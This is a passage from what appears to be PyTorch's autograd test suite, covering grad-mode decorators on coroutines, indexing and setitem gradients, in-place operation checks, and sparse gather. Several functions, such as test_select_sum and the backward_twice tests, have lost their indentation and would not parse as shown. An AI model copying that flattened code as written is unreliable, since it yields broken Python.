        enable_grad_context_manager_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
    # Grad-mode decorators must hold inside a coroutine across send()
    # resumptions, independent of the driving caller's grad mode.
    @torch.no_grad()
    def coro_no_grad(n=10):
        self.assertFalse(torch.is_grad_enabled())
        for i in range(n):
            self.assertFalse(torch.is_grad_enabled())
            r = yield i
            self.assertFalse(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertFalse(torch.is_grad_enabled())

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        self.assertTrue(torch.is_grad_enabled())
        for i in range(n):
            self.assertTrue(torch.is_grad_enabled())
            r = yield i
            self.assertTrue(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertTrue(torch.is_grad_enabled())

    # Drive the no-grad coroutine from an enable-grad scope: the caller's
    # mode must be intact around every send().
    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        coro, r = coro_no_grad(), None
        try:
            while True:
                self.assertTrue(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertTrue(torch.is_grad_enabled())
        except StopIteration:
            pass

    # And the symmetric case.
    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        coro, r = coro_enable_grad(), None
        try:
            while True:
                self.assertFalse(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertFalse(torch.is_grad_enabled())
        except StopIteration:
            pass
def test_set_grad_coroutines_benign_exceptions(self):
    # throw()-ing a recoverable exception into a coroutine must not
    # disturb the grad mode installed by its decorator.
    class RecoverableException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                has_raised = True

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                has_raised = True

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        try:
            while True:
                # Negative yields prove the except branch actually ran.
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass
def test_set_grad_coroutines_critical_exceptions(self):
    # An exception that escapes the coroutine (re-raised as a different
    # type) must still see the decorator's grad mode inside the handler.
    class UnrecoverableException(Exception):
        pass

    class SecondaryException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                raise SecondaryException

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                raise SecondaryException

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        # The re-raised exception propagates out of throw().
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
    # GeneratorExit delivered by close() must also run under the
    # decorator's grad mode.
    @torch.no_grad()
    def coro_no_grad(state):
        for i in range(10):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertFalse(torch.is_grad_enabled())
                # Record that the exit path really ran.
                state.add('GeneratorExit')
                raise

    @torch.enable_grad()
    def coro_enable_grad(state):
        for i in range(10):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertTrue(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    state = set()
    with torch.enable_grad():
        coro = coro_no_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)

    state = set()
    with torch.no_grad():
        coro = coro_enable_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
    """Python Functions should respect grad mode."""
    x = torch.ones(5, 5, requires_grad=True)

    class Increment(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp + 1

        @staticmethod
        def backward(ctx, grad_out):
            return grad_out

    # Applying the Function under no_grad must produce a detached result.
    with torch.no_grad():
        y = Increment.apply(x)
    self.assertFalse(y.requires_grad)
def test_indexing(self):
    # Indexing must backprop exactly 1 into each selected slot.
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    def compare(x, y, idx, indexed_tensor, indexed_var):
        # Check one index expression for forward equality and for the
        # expected one-hot backward gradient.
        indexed_var_t = indexed_var.data
        if not isinstance(indexed_tensor, torch.Tensor):
            indexed_var_t = indexed_var_t[0]
        self.assertEqual(indexed_tensor, indexed_var_t)

        indexed_var.sum().backward()
        expected_grad = torch.empty(x.size()).fill_(0)
        expected_grad[idx] = 1
        self.assertEqual(y.grad, expected_grad)

    def check_index(x, y, idx):
        # Clear grads from the previous check before re-running backward.
        if y.grad is not None:
            with torch.no_grad():
                y.grad.zero_()
        indexed_tensor = x[idx]
        indexed_var = y[idx]
        compare(x, y, idx, indexed_tensor, indexed_var)

    # Basic, slice, mask, and advanced integer indexing on a 2-d tensor.
    check_index(x, y, 1)
    check_index(x, y, (1, 1))
    check_index(x, y, slice(1, None))
    check_index(x, y, slice(None, 2))
    check_index(x, y, (slice(None, 2), 2))
    check_index(x, y, (slice(1, 2), 2))
    check_index(x, y, (1, slice(2, None)))
    check_index(x, y, (slice(None, None), slice(2, None)))
    check_index(x, y, torch.LongTensor([0, 2]))
    check_index(x, y, torch.rand(4, 4).bernoulli().bool())
    check_index(x, y, (Ellipsis, slice(2, None)))
    check_index(x, y, ([0], [0]))
    check_index(x, y, ([1, 2, 3], [0]))
    check_index(x, y, ([1, 2], [2, 1]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([slice(None), [2, 3]]))
    check_index(x, y, ([[2, 3], slice(None)]))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0]))
    check_index(x, y, ([0], ))

    # Same battery of checks on a 3-d tensor.
    x = torch.arange(1., 49).view(4, 3, 4)
    y = Variable(x, requires_grad=True)

    check_index(x, y, (slice(None), [0], [0]))
    check_index(x, y, ([0], [0], slice(None)))
    check_index(x, y, (slice(None), [0, 1, 2], [0]))
    check_index(x, y, ([0, 1, 2], [0], slice(None)))
    check_index(x, y, (slice(None), [1, 2], [2, 1]))
    check_index(x, y, ([1, 2], [2, 1], slice(None)))
    check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
    check_index(x, y, (slice(None), slice(None), [2, 1]))
    check_index(x, y, (slice(None), [2, 1], slice(None)))
    check_index(x, y, ([2, 1], slice(None), slice(None)))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0], ))
    check_index(x, y, ([0], slice(None)))
    check_index(x, y, ([0], Ellipsis))
    check_index(x, y, ([1, 2], [0, 1]))
    check_index(x, y, ([1, 2], [0, 1], Ellipsis))
    check_index(x, y, (Ellipsis, [1, 2], [0, 1]))

    # advanced indexing, with a tensor wrapped in a variable
    z = torch.LongTensor([0, 1])
    zv = Variable(z, requires_grad=False)
    seq = [z, Ellipsis]
    seqv = [zv, Ellipsis]

    if y.grad is not None:
        with torch.no_grad():
            y.grad.zero_()
    indexed_tensor = x[seq]
    indexed_var = y[seqv]
    compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
    # When an index appears multiple times the grads accumulate: each
    # selection contributes +1 to its source slot.
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx:
        expected_grad[i] += 1
    self.assertEqual(y.grad, expected_grad)

    # with advanced indexing
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 3, 2, 1, 2], [0]]
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx[0]:
        for j in idx[1]:
            expected_grad[i][j] += 1
    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)
    idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
    y[idx].sum().backward()
    # Hand-computed accumulation for the paired index lists above;
    # element (0, 1) is selected twice.
    expected_grad = torch.tensor([[0., 2., 0., 0.],
                                  [1., 0., 0., 0.],
                                  [0., 1., 0., 0.],
                                  [0., 0., 0., 0.]])
    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 65).view(4, 4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 1], slice(None), slice(None)]
    y[idx].sum().backward()
    expected_grad = torch.empty(4, 4, 4).zero_()
    # Row 1 is selected three times -> each of its elements gets grad 3.
    expected_grad[1].fill_(3)
    self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
    """Accessing the removed `.volatile` attribute warns and returns False."""
    t = torch.randn(3, 3)
    with warnings.catch_warnings(record=True) as caught:
        self.assertFalse(t.volatile)
    # The first recorded warning must mention the deprecated attribute.
    self.assertIn('volatile', str(caught[0].message))
def test_saved_variables_deprecated(self):
    """Reading ``ctx.saved_variables`` in backward must emit a deprecation warning."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            ctx.save_for_backward(tensor1, tensor2)
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            # Deliberately uses the deprecated alias of ctx.saved_tensors.
            var1, var2 = ctx.saved_variables
            return (grad_output, grad_output)

    with warnings.catch_warnings(record=True) as warns:
        warnings.simplefilter("always")
        x = torch.randn((3, 3), requires_grad=True)
        y = torch.randn((3, 3), requires_grad=True)
        MyFunction.apply(x, y).sum().backward()

        # Idiomatic replacement for the old map()+reduce() pipeline; also
        # safe when no warnings were recorded (reduce() would raise).
        has_deprecated = any('deprecated' in str(warn) and
                             'saved_variables' in str(warn)
                             for warn in warns)
        self.assertTrue(has_deprecated)
def test_requires_grad(self):
    # requires_grad must propagate through ops, and backward must not
    # visit subgraphs whose tensors do not require grad.
    x = torch.randn(5, 5)
    y = torch.randn(5, 5)
    z = torch.randn(5, 5, requires_grad=True)
    a = x + y
    self.assertFalse(a.requires_grad)
    b = a + z
    self.assertTrue(b.requires_grad)

    def error():
        raise RuntimeError
    # Make sure backward isn't called on these
    # NOTE: pokes the private _backward_hooks dict directly; a hook that
    # raises would fail the test if backward ever reached these tensors.
    a._backward_hooks = OrderedDict()
    x._backward_hooks = OrderedDict()
    y._backward_hooks = OrderedDict()
    a._backward_hooks['test'] = error
    x._backward_hooks['test'] = error
    y._backward_hooks['test'] = error
    b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
    """requires_grad_() returns self and toggles the flag; non-leafs can't disable it."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)

    # Enabling (implicitly and explicitly) returns the tensor itself.
    for t in (x, y):
        self.assertIs(t, t.requires_grad_())
        self.assertTrue(t.requires_grad)
        self.assertIs(t, t.requires_grad_(True))
        self.assertTrue(t.requires_grad)

    z = x * y
    # A non-leaf cannot drop requires_grad, but may re-assert it.
    self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
    self.assertIs(z, z.requires_grad_())
    self.assertTrue(z.requires_grad)
    self.assertIs(z, z.requires_grad_(True))
    self.assertTrue(z.requires_grad)

    # Leaves can switch the flag back off.
    for t in (x, y):
        self.assertIs(t, t.requires_grad_(False))
        self.assertFalse(t.requires_grad)
def test_requires_grad_inplace(self):
    """In-place adding a grad-requiring tensor makes the target require grad."""
    target = torch.randn(5, 5)
    source = torch.randn(5, 5, requires_grad=True)
    target += source
    self.assertTrue(target.requires_grad)

    # Same check when the target is a non-leaf.
    target = torch.randn(5, 5) + 0
    source = torch.randn(5, 5, requires_grad=True)
    target += source
    self.assertTrue(target.requires_grad)
def test_no_requires_grad_inplace(self):
    """In-place ops are fine before requires_grad is set, forbidden after."""
    # Plain tensor: in-place mutation before enabling grad is allowed.
    t = torch.randn(2, 3)
    t.add_(5)
    t.requires_grad = True
    t.sum().backward()
    self.assertEqual(t.grad, torch.ones(2, 3))

    # Same, mutating through a view of the base.
    t = torch.randn(2, 3)
    view = t[:]
    view.add_(5)
    t.requires_grad = True
    t.sum().backward()
    self.assertEqual(t.grad, torch.ones(2, 3))

    # Once requires_grad is set, in-place on the leaf or any view must fail.
    t = torch.randn(2, 3)
    view = t[:]
    t.requires_grad = True
    with self.assertRaises(RuntimeError):
        t.add_(5)
    with self.assertRaises(RuntimeError):
        view.add_(5)
def test_attribute_deletion(self):
    """Only `.grad` may be deleted; other autograd attributes are protected."""
    t = torch.randn((5, 5), requires_grad=True)
    # Deleting grad resets it to None.
    del t.grad
    self.assertIsNone(t.grad)
    # Everything else refuses deletion (and .data refuses None assignment).
    with self.assertRaises(RuntimeError):
        del t.data
    with self.assertRaises(TypeError):
        t.data = None
    with self.assertRaises(RuntimeError):
        del t.requires_grad
    with self.assertRaises(RuntimeError):
        del t._grad_fn
    with self.assertRaises(RuntimeError):
        del t._backward_hooks
def test_duplicate_backward_root(self):
    """Passing the same root twice accumulates its gradient twice."""
    a = torch.randn(5, 5, requires_grad=True)
    b = torch.randn(5, 5, requires_grad=True)

    prod = a * b
    go = torch.randn_like(prod)
    torch.autograd.backward([prod, prod], [go, go])

    self.assertEqual(a.grad, b * go * 2)
    self.assertEqual(b.grad, a * go * 2)
def test_backward_no_grad(self):
    """A None gradient for a non-scalar root is rejected by backward."""
    leaf = torch.randn(5, 5, requires_grad=True)
    out = leaf + 2
    with self.assertRaises(RuntimeError):
        torch.autograd.backward([out], [None])
def test_backward_twice_with_saved_values(self):
    """A second backward without retain_graph must fail once state was freed."""
    src = torch.randn(3, requires_grad=True, dtype=torch.double)
    dst = torch.zeros(3, dtype=torch.double)
    dst[[1, 2]] = src[[1, 1]]
    ones = torch.tensor([1, 1, 1], dtype=torch.double)
    dst.backward(ones)
    self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
                           lambda: dst.backward(ones))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
    """backward(create_graph=True) warns; autograd.grad(create_graph=True) doesn't.

    The flag is read and set *before* entering the try block: in the old
    version ``prev`` was assigned inside ``try``, so a failure on that first
    line would have raised a NameError from ``finally`` instead of the real
    error.
    """
    prev = torch.is_warn_always_enabled()
    torch.set_warn_always(True)
    try:
        b = torch.randn(3, requires_grad=True, dtype=torch.double)
        c = b * b
        with warnings.catch_warnings(record=True) as ws:
            c.backward(torch.ones_like(c), create_graph=True)
        b.grad = None
        self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))

        # Should not warn for grad
        with warnings.catch_warnings(record=True) as ws:
            torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
        self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
    finally:
        # Always restore the global warn-always setting.
        torch.set_warn_always(prev)
def test_next_functions(self):
    """grad_fn.next_functions exposes (node, output_index) pairs of the graph."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    a = x + y
    self.assertIsNotNone(a.grad_fn)
    next_functions = a.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    # Both inputs are leaves, so their graph nodes are AccumulateGrad.
    self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[0][1], 0)
    self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[1][1], 0)

    b = a + 5
    next_functions = b.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIs(next_functions[0][0], a.grad_fn)
    # The scalar 5 is not differentiable, hence a None edge.
    self.assertIs(next_functions[1][0], None)
def test_inplace(self):
    """In-place ops must raise on backward only when they clobber saved tensors."""
    x = torch.ones(5, 5, requires_grad=True)
    y = Variable(torch.ones(5, 5) * 4, requires_grad=True)

    z = x * y
    q = z + y
    w = z * y
    z.add_(2)
    # Add doesn't need its inputs to do backward, so it shouldn't raise
    q.backward(torch.ones(5, 5), retain_graph=True)
    # Mul saves both inputs in forward, so it should raise
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))

    z = x * y
    q = z * y
    r = z + y
    w = z.add_(y)
    # w is the last expression, so this should succeed
    w.backward(torch.ones(5, 5), retain_graph=True)
    # r doesn't use the modified value in backward, so it should succeed
    r.backward(torch.ones(5, 5), retain_graph=True)
    # q uses dirty z, so it should raise
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    with torch.no_grad():
        x.grad.zero_()
    m = x / 2
    z = m + y / 8
    q = z * y
    r = z + y
    # exp_() bumps the version counter of z; record it to check.
    prev_version = z._version
    w = z.exp_()
    self.assertNotEqual(z._version, prev_version)
    r.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.ones(5, 5) / 2)
    w.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    leaf = torch.ones(5, 5, requires_grad=True)
    x = leaf.clone()
    x.add_(10)
    self.assertEqual(x, torch.ones(5, 5) * 11)
    # x should be still usable
    y = x + 2
    y.backward(torch.ones(5, 5))
    self.assertEqual(leaf.grad, torch.ones(5, 5))
    z = x * y
    x.add_(2)
    # z's backward needs the pre-add_ value of x, so this must fail.
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
    """Outputs marked non-differentiable get requires_grad=False and a zero grad."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            output = input > 0
            ctx.mark_non_differentiable(output)
            return output

        @staticmethod
        def backward(ctx, grad_output):
            # The incoming grad for a non-differentiable output is zeros.
            return (grad_output * 0).to(torch.double)

    x = torch.randn(5, 5, requires_grad=True)
    mask = MyFunction.apply(x)
    self.assertFalse(mask.requires_grad)
    y = x.masked_fill(mask, 0)
    y.sum().backward()
def test_mark_non_differentiable_mixed(self):
    """Mixing non-differentiable and differentiable outputs routes grads correctly."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            a = input + 1
            b = input + 2
            ctx.mark_non_differentiable(a)
            return a, b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            # grad for the non-differentiable output must arrive as zeros.
            self.assertTrue((grad_a == 0).all())
            self.assertTrue((grad_b == 1).all())
            return grad_b

    x = torch.randn(5, 5, requires_grad=True)
    a, b = MyFunction.apply(x)
    self.assertFalse(a.requires_grad)
    self.assertTrue(b.requires_grad)
    b.sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
    # This used to segfault because MyFunction would send back null
    # gradients to MulBackward, which is implemented in C++. C++
    # implemented functions expect incoming grad_outputs to be non-null.
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            output = input.clone()
            ctx.mark_non_differentiable(output)
            return output

        @staticmethod
        def backward(ctx, grad_output):
            return None

    x = torch.randn(5, 5, requires_grad=True)
    r = MyFunction.apply(x * x)
    # Must not crash even though MyFunction.backward returns None.
    (r * x).sum().backward()
def test_return_duplicate(self):
    """A custom Function may return the same tensor twice; grads still check out."""
    class DoubleDuplicate(Function):
        @staticmethod
        def forward(ctx, x):
            output = x * 2
            return output, output

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def fn(x):
        a, b = DoubleDuplicate.apply(x)
        # Both returned outputs should be the very same tensor object.
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(fn, [x])
    gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
    """Returning a dirtied tensor twice works; in-place rules still apply."""
    class DoubleInplace(Function):
        @staticmethod
        def forward(ctx, x):
            x.mul_(2)
            ctx.mark_dirty(x)
            return x, x

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def inplace_fn(x):
        # Clone so the in-place op does not touch a leaf variable.
        a, b = DoubleInplace.apply(x.clone())
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(inplace_fn, [x])
    gradgradcheck(inplace_fn, [x])

    # Can't modify leaf variables in-place
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
    # Functions which modify views in-place must return only one output
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
def _test_setitem(self, size, index):
    """Helper: setting y[index] to a constant zeroes the grad at those positions."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    # Assignment is in-place and must bump y's version counter.
    y_version = y._version
    y[index] = 2
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    # Overwritten entries do not backprop to x.
    expected_grad = torch.ones(*size)
    expected_grad[index] = 0
    self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
    """Helper: setting y[index] to a grad-requiring tensor routes grads to both."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    y_version = y._version
    value = x.new(x[index].size()).fill_(7)
    value.requires_grad = True
    y[index] = value
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    # Overwritten positions backprop to `value` instead of x.
    expected_grad_input = torch.ones(*size)
    expected_grad_input[index] = 0
    self.assertEqual(x.grad, expected_grad_input)
    self.assertEqual(value.grad, torch.ones_like(value))

    # case when x broadcasts as y[1]
    x = torch.randn(4, requires_grad=True)
    y = torch.zeros(2, 3, 4)
    y[1] = x
    y.backward(torch.randn(2, 3, 4))
    self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
    """Exercise __setitem__ autograd across scalar, list, slice and tensor indices."""
    self._test_setitem((5, 5), 1)
    self._test_setitem((5,), 1)
    self._test_setitem((1,), 0)
    self._test_setitem((10,), [[0, 4, 2]])
    self._test_setitem((5, 5), [[0, 4], [2, 2]])
    self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5), 3)
    self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
    self._test_setitem_tensor((5,), 3)
    self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
    self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
                              3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
    """__setitem__ autograd with boolean-mask indices."""
    mask = torch.BoolTensor(5, 5).bernoulli_()
    self._test_setitem((5, 5), Variable(mask))
    self._test_setitem((5,), Variable(mask[0]))
    self._test_setitem((1,), Variable(mask[0, 0:1]))
    self._test_setitem_tensor((5, 5), Variable(mask))
    self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
    """grad through diagonal() accepts an expanded (non-contiguous) grad vector."""
    value = torch.rand([])
    v_expanded = torch.tensor(value).expand(10)
    a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
    result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
    # The grad of diagonal() scatters v back onto the diagonal only.
    self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
    """grad through a[0] accepts an expanded grad vector."""
    v_expanded = torch.rand(10).expand(10, 10)
    a = torch.rand(10, 10, 10, requires_grad=True)
    result, = torch.autograd.grad(a[0], a, v_expanded)
    # Only the selected slice receives gradient.
    expected = torch.zeros(10, 10, 10)
    expected[0] = v_expanded
    self.assertEqual(result, expected)
def test_slice_expanded_v(self):
    """grad through a slice a[3:5] accepts an expanded grad vector."""
    v_expanded = torch.rand(10, 1).expand(2, 10, 10)
    a = torch.rand(10, 10, 10, requires_grad=True)
    result, = torch.autograd.grad(a[3:5], a, v_expanded)
    # Only the sliced rows receive gradient.
    expected = torch.zeros(10, 10, 10)
    expected[3:5] = v_expanded
    self.assertEqual(result, expected)
def test_unused_output(self):
    """Backward through one chunk leaves the unused chunks' grads at zero."""
    x = torch.randn(10, 10, requires_grad=True)
    outputs = x.chunk(5)
    o = outputs[2]
    o = o * 4 + 2
    o.sum().backward()
    # Only rows 4:6 (the third chunk) contributed to the loss.
    expected_grad = torch.zeros(10, 10)
    expected_grad[4:6] = 4
    self.assertEqual(x.grad, expected_grad)

    with torch.no_grad():
        x.grad.zero_()
    grad_output = torch.randn(2, 10)
    outputs = x.chunk(5)
    outputs[0].backward(grad_output)
    expected_grad = torch.zeros(10, 10)
    expected_grad[:2] = grad_output
    self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
    """Helper: gather with sparse_grad=True must match the dense gradient."""
    x = torch.randn(size_x, requires_grad=True)
    if len(size_ind) > 0 and len(size_x) > 0:
        ind = torch.randint(x.size(dim), size_ind)
    else:
        # Scalar x and/or scalar index: the only valid index is 0.
        ind = torch.zeros(size_ind, dtype=torch.int64)
    out = torch.gather(x, dim, ind, sparse_grad=False)
    grad = torch.rand_like(out)
    out.backward(grad)
    grad_dense = x.grad.clone()
    x.grad = None
    out = torch.gather(x, dim, ind, sparse_grad=True)
    out.backward(grad)
    # Densify the sparse grad before comparing.
    self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
    """Sparse vs. dense gather gradient along dim 0 of a 2-D input."""
    self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
    """Sparse vs. dense gather gradient along dim 1 of a 3-D input."""
    self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
    """Sparse vs. dense gather gradient along a negative dim."""
    self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
    """Sparse vs. dense gather gradient with a scalar index."""
    self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
    """Sparse vs. dense gather gradient with a scalar input."""
    self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
    """Sparse vs. dense gather gradient with scalar input and scalar index."""
    self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
    """
    Previously, if a Function destructor triggered a garbage collection,
    the Variable's tp_dealloc handler would get called twice leading to a
    segfault.
    """
    class CollectOnDelete(Function):
        def forward(self, x):
            return x

        def backward(self, grad_output):
            return grad_output

        def __del__(self):
            # Force a GC cycle from inside the destructor.
            gc.collect()

    # Repeat to give the double-dealloc a chance to reproduce.
    for _ in range(10):
        CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
    """Accessing node-only attributes on an instantiated Function errors cleanly."""
    class Id(Function):
        @staticmethod
        def forward(ctx, x):
